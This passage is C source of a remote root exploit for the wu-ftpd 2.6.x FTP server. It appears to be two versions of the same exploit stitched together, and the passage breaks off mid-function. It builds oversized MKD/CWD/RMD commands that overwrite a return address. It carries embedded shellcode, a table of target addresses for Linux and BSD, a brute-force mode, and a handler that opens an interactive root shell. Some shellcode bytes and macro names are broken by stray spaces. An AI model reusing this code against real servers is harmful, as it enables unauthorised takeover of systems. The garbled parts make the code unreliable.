else /* RMD command */
{
atk_bf[cmd_f++]=(0x52);
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(DEF_ANSH);r_rn_2++)
atk_bf[r_rn_1++]=(0x41);
{
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x0d);
atk_bf[r_rn_1++]=(0x0a);
}
send(sock,atk_bf,strlen(atk_bf),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(type) /* MKD command */
{
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
}
else /* RMD command */
{
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
}
return;
}
int main(int argc,char *argv[])
{
int opt_g,sock,__bf=(NRL);
int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
char user_id[(DEF_VA)]=(DEF_STR);
char pass_wd[(DEF_VA)]=(DEF_STR);
char tg_host[(DEF_VA)]=(DEF_HOST);
int tg_port=(DEF_PORT);
u_long sh_addr=(plat[t_g].sh_addr);
(void)banrl();
while((opt_g=getopt(argc,argv,"M:m:H:h:U:u:P:p:N:n:S:s:T:t:BbIi"))!=EOF)
{
extern char *optarg;
switch(opt_g)
{
case 'M':
case 'm':
mx_bf=(atoi(optarg));
bf_lsz=((0x1000)/mx_bf);
break;
case 'H':
case 'h':
memset((char *)tg_host,(NRL),sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;
case 'U':
case 'u':
memset((char *)user_id,(NRL),sizeof(user_id));
strncpy(user_id,optarg,sizeof(user_id)-1);
break;
case 'P':
case 'p':
memset((char *)pass_wd,(NRL),sizeof(pass_wd));
strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
break;
case 'N':
case 'n':
tg_port=(atoi(optarg));
break;
case 'S':
case 's':
sh_addr=strtoul(optarg,(NRL),(NRL));
break;
case 'T':
case 't':
if((t_g=(atoi(optarg)))<(3))
sh_addr=(plat[t_g].sh_addr);
else (void)prcode_usage(argv[(NRL)]);
break;
case 'B':
case 'b':
__bf=(SCS);
break;
case 'I':
case 'i':
(void)prcode_usage(argv[(NRL)]);
break;
case '?':
(void)prcode_usage(argv[(NRL)]);
break;
}
}
if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DE F_STR)))
(void)prcode_usage(argv[(NRL)]);
memset((char *)home_dir,(NRL),sizeof(home_dir));
snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(HOME_DIR),user_id);
if(!__bf)
{
fprintf(stdout," Target: %s.\n",(plat[t_g].v_nm));
fprintf(stdout," [+] address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);
}
else
{
int bt_num=(NRL);
t_g=(4);
sh_addr=(plat[t_g].sh_addr);
fprintf(stdout," Brute-Force mode.\n");
fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);
for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
{
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
fprintf(stdout," #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [2] send exploit code.\n");
if(bt_num==(NRL))
{
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
}
else
{
(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
}
close(sock);
fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);
sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");
fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);
fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));
fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);
fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);
sh_addr+=(bf_lsz);
}
}
exit(NRL);
}
int setsock(char *u_host,int u_port)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
{
return(FAD);
}
if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD) )
{
return(FAD);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(u_port);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
{
return(FAD);
}
return(sock);
}
void conn_shell(int conn_sock)
{
int died;
int ex_t=(NRL);
char *command=(DEF_COMM);
char readbuf[(GET_R)];
fd_set rset;
memset((char *)readbuf,(NRL),sizeof(readbuf));
fprintf(stdout," Send, command packet !\n\n");
send(conn_sock,command,strlen(command),(NRL));
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(conn_sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(conn_sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(conn_sock,&rset))
{
died=read(conn_sock,readbuf,sizeof(readbuf)-1);
if(died<=(NRL))
{
if(!ex_t)
return;
else
exit(NRL);
}
readbuf[died]=(NRL);
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>(NRL))
{
readbuf[died]=(NRL);
if(strstr(readbuf,"exit"))
ex_t=(SCS);
write(conn_sock,readbuf,died);
}
}
}
return;
}
void re_connt(int st_sock_va)
{
if(st_sock_va==(FAD))
{
fprintf(stdout," [ Fail ]\n\n");
exit(FAD);
}
}
void banrl()
{
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}
/* eoc */
# [2003-08-03]
21 wu-ftpd 2.6.2 Remote Root Exploit (advanced version)
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
**
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
**
** Update:
** [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** [v0.0.3] August 3, Brute-Force function addition.
** [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
** It will be applied well to most XxxxBSD.
** [v0.0.5] August 4, Remote scan & exploit test function addition.
** August 6, Cleaning.
**
*/
#define VERSION "v0.0.5"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"
void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock,u_long scs_addr);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
int bscann(char *chk_ban);
int check_exp(int sock);
struct os
{
int num;
char *v_nm;
u_long sh_addr;
u_long bf_addr;
char *shellcode;
int off_st;
char *home;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
int __exp_test=(NRL); /* check exploit test */
int b_scan=(NRL); /* banner check */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
/* setuid/chroot-break/execve shellcode by Lam3rZ */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x 31\xdb\x43\x89"
"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\x c9\x8d\x5e\x01"
"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x 31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x 43\x02\x31\xc9"
"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\x c9\x75\xf3\x31"
"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x 0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x 89\x46\x0c\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\x c0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x 62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
char bsd_shellcode_ffx2[]=
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\x c0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x 31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x 53\xb0\x88"
"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x 80\x31"
"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\x c9\x31"
"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x 75\xf1"
"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\x cd\x80"
"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x 46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x 56\x0c"
"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x 53\x53"
"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x 30\x62\x69\x6e\x30"
"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x 69\x6e"
"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x 65\x2e"
"\x63\x6f\x6d";
struct os plat[]=
{
/*
** I enjoy version up, will not share more. :-}
*/
{
0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HO ME_DIR_LINUX)
},
{
1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HO ME_DIR_LINUX)
},
{
2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HO ME_DIR_LINUX)
},
{
3,"FreeBSD 4.6.2-RELEASE Version wu-2.6.0 compile",0x0806b826,
0x0806b026,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_FRBSD)
},
{
4,"FreeBSD 4.6.2-RELEASE Version wu-2.6.1 compile",0x0806cb36,
0x0806c036,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_FRBSD)
},
{
5,"FreeBSD 4.6.2-RELEASE Version wu-2.6.2 compile",0x0806ccaa,
0x0806c082,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_FRBSD)
},
{
6,"OpenBSD 3.0 Version wu-2.6.0 compile",0xdfbfc8f8,
0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_OPBSD)
},
{
7,"OpenBSD 3.0 Version wu-2.6.1 compile",0xdfbfc8f8,
0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_OPBSD)
},
{
8,"OpenBSD 3.0 Version wu-2.6.2 compile",0xdfbfc8f8,
0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HO ME_DIR_OPBSD)
},
{
0x82,NULL,0x0,0x0,NULL,0,NULL
}
};
void prcode_usage(char *f_nm)
{
int r_n=(NRL);
fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
fprintf(stdout," \t-u [userid] : User id.\n");
fprintf(stdout," \t-p [passwd] : User password.\n");
fprintf(stdout," \t-n [port num] : Target port number.\n");
fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
fprintf(stdout," \t-i : help information.\n");
fprintf(stdout," \t-q : banner scan mode.\n");
fprintf(stdout," \t-c : check exploit test.\n");
fprintf(stdout," \t-t [target num] : Select target number.\n");
fprintf(stdout," \t-b [target num] : Brute-Force mode. (Select target number)\n\n");
for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
{
fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
}
fprintf(stdout,"\n Example1: %s -hlocalhost -ux82 -px82 -n21 -t0",f_nm);
fprintf(stdout,"\n Example2: %s -hwu_sub -ux82 -px82 -n21 -b0",f_nm);
fprintf(stdout,"\n Example3: %s -h0 -ux82 -px82 -qc -t0\n\n",f_nm);
exit(FAD);
}
u_long null_chk(u_long sh_addr)
{
int chk_0x2f=(NRL);
for(chk_0x2f=(NRL);chk_0x2f<0x20;chk_0x2f+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0x2f)&0xff)==(0x2f))
{
fprintf(stderr," [-] slash was included to &shellcode address.\n\n");
exit(FAD);
}
}
if((sh_addr>>(NRL)&0xff)==(0x00))
{
return(sh_addr+=(SCS));
}
else return(sh_addr);
}
int bscann(char *chk_ban)
{
fprintf(stdout,"\n [+] Checking, banner ...\n");
if(strstr(chk_ban,"wu-2.6.0"))
{
fprintf(stdout," [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n");
return(SCS);
}
else if(strstr(chk_ban,"wu-2.6.1"))
{
fprintf(stdout," [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n");
return(SCS);
}
else if(strstr(chk_ban,"wu-2.6.2"))
{
fprintf(stdout," [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n");
return(SCS);
}
else
{
fprintf(stdout," [x] This version does not support exploit.\n");
return(FAD);
}
}
void ftpd_login(int sock,char *user,char *pass)
{
char send_recv[(GET_R)];
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(b_scan)
{
b_scan=(NRL);
if(((int)bscann(send_recv))==(FAD))
{
fprintf(stdout," [-] exploit stop.\n\n");
exit(FAD);
}
}
if(!strstr(send_recv,(FTP_CONN_SCS)))
{
fprintf(stdout," [-] ftpd connection failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," ftpd connection success.\n");
fprintf(stdout," [+] User id input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(!strstr(send_recv,(FTP_USER_FAD)))
{
fprintf(stdout," [-] User id input failure.\n\n");
close(sock);
exit(FAD);
}
else fprintf(stdout," [+] User password input.\n");
memset((char *)send_recv,(NRL),sizeof(send_recv));
snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
send(sock,send_recv,strlen(send_recv),(NRL));
(u_int)sleep(SCS);
memset((char *)send_recv,(NRL),sizeof(send_recv));
recv(sock,send_recv,sizeof(send_recv)-1,(NRL));
if(strstr(send_recv,(FTP_LOGIN_FAD)))
{
fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
close(sock);
exit(FAD);
}
else if(strstr(send_recv,(FTP_LOGIN_SCS)))
{
fprintf(stdout," User %s logged in.\n",user);
}
else
{
fprintf(stdout," [-] ftpd handshake failure.\n\n");
close(sock);
exit(FAD);
}
return;
}
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
{
dir_nm[dr_n]=(gb_character);
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD command failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD command failed.\n\n");
exit(FAD);
}
return;
}
int send_shellcode(int sock,int type,char *dir_nm)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);
for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(plat[t_g].shellcode);dr_n++)
{
dir_nm[dr_n]=(DEF_NOP);
}
for(cmd_f=(NRL);cmd_f<strlen(plat[t_g].shellcode);cmd_f++)
{
dir_nm[dr_n++]=plat[t_g].shellcode[cmd_f];
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);
if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,(GET_R)-1,(NRL));
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
exit(FAD);
}
return;
}
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
char atk_bf[(GET_R)];
switch(t_g)
{
case 0:
case 1:
case 2:
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44)); /* 04 */
fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45)); /* 05 */
fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46)); /* 06 */
fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47)); /* 07 */
fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48)); /* 08 */
fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49)); /* 09 */
fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50)); /* 10 */
fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51)); /* 11 */
fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52)); /* 12 */
fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53)); /* 13 */
fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54)); /* 14 */
fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55)); /* 15 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
break;
case 3:
case 4:
case 5:
case 6:
case 7:
case 8:
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 04 */
break;
}
if(type&&__exp_test)
{
__exp_test=(NRL);
if(((int)check_exp(sock))==(FAD))
{
fprintf(stderr," [-] This isn't vulnerable.\n\n");
exit(FAD);
}
}
return;
}
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];
memset((char *)atk_bf,(NRL),(GET_R));
if(type) /* MKD command */
{
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x4b);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
else /* RMD command */
{
atk_bf[cmd_f++]=(0x52);
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(plat[t_g].off_st);r_rn_2++)
atk_bf[r_rn_1++]=(0x41);
{
int chk_0xff=(NRL);
switch(t_g)
{
case 0:
case 1:
case 2:
/* frame pointer */
*(long *)&atk_bf[r_rn_1]=0x82828282;
r_rn_1+=(DEF_ALIGN);
for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0xff)&0xff)==(0xff))
atk_bf[r_rn_1++]=0xff;
atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
}
break;
case 3:
case 4:
case 5:
/* frame pointer */
*(long *)&atk_bf[r_rn_1]=0x82828282;
r_rn_1+=(DEF_ALIGN);
for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0xff)&0xff)==(0xff))
atk_bf[r_rn_1++]=0xff;
atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
}
for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
{
atk_bf[r_rn_1++]=(0x41);
}
break;
case 6:
case 7:
case 8:
for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
{
atk_bf[r_rn_1++]=(0x41);
}
/* frame pointer */
*(long *)&atk_bf[r_rn_1]=0x82828282;
r_rn_1+=(DEF_ALIGN);
for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
{
if((sh_addr>>(chk_0xff)&0xff)==(0xff))
atk_bf[r_rn_1++]=0xff;
atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
}
break;
}
*(long *)&atk_bf[r_rn_1]=0x41414141;
r_rn_1+=(DEF_ALIGN);
*(long *)&atk_bf[r_rn_1]=0x0d414141;
r_rn_1+=(DEF_ALIGN);
atk_bf[r_rn_1++]=(0x0a);
}
send(sock,atk_bf,strlen(atk_bf),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));
if(type) /* MKD command */
{
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
}
else /* RMD command */
{
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
}
return;
}
int main(int argc,char *argv[])
{
int opt_g,sock,__bf=(NRL);
int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
char user_id[(DEF_VA)]=(DEF_STR);
char pass_wd[(DEF_VA)]=(DEF_STR);
char tg_host[(DEF_VA)]=(DEF_HOST);
int tg_port=(DEF_PORT);
u_long sh_addr=(plat[t_g].sh_addr);
(void)banrl();
while((opt_g=getopt(argc,argv,"QqCcM:m:H:h:U:u:P:p:N:n:S:s:T:t:B:b:Ii"))!=EOF)
{
extern char *optarg;
switch(opt_g)
{
case 'Q':
case 'q':
fprintf(stdout," Banner scan mode.\n");
b_scan=(SCS);
break;
case 'C':
case 'c':
fprintf(stdout," Check exploit test mode.\n");
